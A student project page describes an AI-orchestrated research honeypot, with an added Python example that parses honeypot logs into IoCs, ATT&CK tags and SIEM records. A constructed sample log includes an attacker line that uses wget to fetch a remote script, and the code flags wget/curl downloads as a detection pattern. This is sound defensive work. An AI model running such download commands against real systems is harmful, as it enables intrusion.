Cyber Deception Intelligence System
Immersive Technologies
Semester programme: Future innovators / Creative technology
Client company: Vodafone Oman
Taha Al-Abrawi
Al-Waleed Al-Sheriyani
Project description
How can a dynamic, high-interaction, research-based honeypot be deployed to mimic a real corporate network, engage attackers, and extract actionable Threat Intelligence (TI), including Indicators of Compromise (IoCs) and Tactics, Techniques, and Procedures (TTPs), and how can specialized AI agents automate the orchestration and adaptive management of such a honeypot to ensure scalability and effectiveness?
Context
The Cyber Deception Intelligence System (CDIS) is situated within the cybersecurity domain, focusing on advanced Cyber Threat Intelligence (CTI) and active defense through cyber deception. The initiative addresses the shortcomings of traditional, reactive security measures, which are often insufficient against sophisticated modern attacks. Standard honeypots are frequently static and easily recognized by adversaries, which limits their ability to gather high-quality intelligence.
Results
The project’s most important outcome is a functional Proof-of-Concept (PoC) framework that answers our main research question: it is possible to use specialized AI agents to automate the orchestration and management of a research-based honeypot. Our prototype AI System successfully interacted with the SOC Stack (Elastic SIEM) to manage the Honeypot. This validates the architectural blueprint as viable, moving it from a theoretical concept to a working model.
About the project group
Our project group is developing the Cyber Deception Intelligence System (CDIS), a proactive security solution designed to counter sophisticated cyber threats. The team's primary researcher has a background in Infrastructure, Cyber Security & Generative AI and is focused on building the AI System stack. This system employs agentic AI to automate the orchestration and management of a dynamic, high-interaction honeypot that mimics a corporate network. The core mission is to engage attackers, analyze their behavior in real-time, and extract actionable Threat Intelligence (TI), including TTPs and IoCs.
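The pipeline the group describes (honeypot sessions in, IoCs and TTPs out, an orchestration decision fed back to the honeypot, and documents handed to the SIEM) can be sketched in a few functions. The following is an added, self-contained illustration written for this page; it is not CDIS code and does not reflect the project's actual log format, AI agents or Elastic integration. The log format, the behaviour-to-technique heuristics, the action names and the ECS-style field names are all assumptions of this example; the sample log is constructed and uses RFC 5737 documentation addresses. The MITRE ATT&CK technique IDs cited in comments are real, but the rules that assign them are the example's own simplifications.

```python
import re
from collections import defaultdict

# Constructed sample honeypot session log. Assumed format: "<ts> <src-ip> <login|cmd> <details>".
# Addresses are from the RFC 5737 documentation ranges; nothing here is real attacker data.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z 203.0.113.5 login user=root password=123456 result=fail
2024-01-01T10:00:02Z 203.0.113.5 login user=root password=admin result=fail
2024-01-01T10:00:03Z 203.0.113.5 login user=root password=toor result=fail
2024-01-01T10:00:04Z 203.0.113.5 login user=root password=changeme result=success
2024-01-01T10:00:05Z 203.0.113.5 cmd uname -a
2024-01-01T10:00:07Z 203.0.113.5 cmd wget http://198.51.100.77/x.sh
2024-01-01T10:01:00Z 198.51.100.9 login user=admin password=admin result=fail
2024-01-01T10:01:01Z 198.51.100.9 login user=admin password=password result=fail
2024-01-01T10:01:02Z 198.51.100.9 login user=admin password=admin123 result=fail
2024-01-01T10:02:00Z 192.0.2.44 login user=test password=test result=fail
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<kind>login|cmd) (?P<rest>.*)$")
LOGIN_RE = re.compile(r"user=(?P<user>\S+) password=(?P<password>\S+) result=(?P<result>\S+)")
URL_RE = re.compile(r"https?://\S+")

BRUTE_FORCE = "T1110 Brute Force"                     # ATT&CK T1110
DISCOVERY = "T1082 System Information Discovery"      # ATT&CK T1082
TOOL_TRANSFER = "T1105 Ingress Tool Transfer"         # ATT&CK T1105


def parse_log(text):
    """Turn raw log text into event dicts; malformed lines are skipped rather than crashing the pipeline."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = {"ts": m["ts"], "src": m["src"], "kind": m["kind"]}
        if ev["kind"] == "login":
            lm = LOGIN_RE.search(m["rest"])
            if not lm:
                continue
            ev.update(lm.groupdict())
        else:
            ev["command"] = m["rest"]
        events.append(ev)
    return events


def extract_iocs(events):
    """IoCs observed across sessions: source IPs, credential pairs tried, URLs referenced in commands."""
    iocs = {"source_ips": set(), "credentials": set(), "urls": set()}
    for ev in events:
        iocs["source_ips"].add(ev["src"])
        if ev["kind"] == "login":
            iocs["credentials"].add((ev["user"], ev["password"]))
        else:
            iocs["urls"].update(URL_RE.findall(ev["command"]))
    return iocs


def tag_ttps(events, brute_force_threshold=3):
    """Map observed behaviour to technique labels per source (heuristics are this example's own)."""
    fails = defaultdict(int)
    ttps = defaultdict(set)
    for ev in events:
        if ev["kind"] == "login":
            if ev["result"] == "fail":
                fails[ev["src"]] += 1
            if fails[ev["src"]] >= brute_force_threshold:
                ttps[ev["src"]].add(BRUTE_FORCE)
        else:
            argv = ev["command"].split()
            if argv and argv[0] in {"uname", "id", "whoami"}:
                ttps[ev["src"]].add(DISCOVERY)
            if argv and argv[0] in {"wget", "curl"} and URL_RE.search(ev["command"]):
                ttps[ev["src"]].add(TOOL_TRANSFER)
    return {src: sorted(t) for src, t in ttps.items()}


def plan_actions(events, ttps):
    """Per-source orchestration decision an agent could hand back to the honeypot controller (assumed action names):
    sources that got past login and ran commands are kept engaged with full telemetry; sources that only
    brute-forced get fresh decoy credentials; everything else stays on plain monitoring."""
    active = {ev["src"] for ev in events if ev["kind"] == "cmd"}
    actions = {}
    for src in {ev["src"] for ev in events}:
        if src in active:
            actions[src] = "extend_session_and_capture_full_telemetry"
        elif BRUTE_FORCE in ttps.get(src, []):
            actions[src] = "rotate_decoy_credentials"
        else:
            actions[src] = "monitor"
    return actions


def to_siem_docs(events, ttps):
    """Flatten events into ECS-style documents (field names assumed) that a SIEM such as Elastic could index."""
    docs = []
    for ev in events:
        doc = {"@timestamp": ev["ts"], "source.ip": ev["src"], "event.action": ev["kind"],
               "threat.technique.id": [t.split()[0] for t in ttps.get(ev["src"], [])]}
        if ev["kind"] == "login":
            doc["user.name"], doc["event.outcome"] = ev["user"], ev["result"]
        else:
            doc["process.command_line"] = ev["command"]
        docs.append(doc)
    return docs


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    ttps = tag_ttps(evs)
    print(extract_iocs(evs))
    print(ttps)
    print(plan_actions(evs, ttps))
```

Running the script on the constructed log tags 203.0.113.5 with brute force, discovery and tool transfer and keeps that session engaged, rotates decoy credentials for the source that only guessed passwords, and leaves the single failed attempt on monitoring; the SIEM documents carry the technique IDs alongside each event so analysts can pivot from a SIEM alert back to the session.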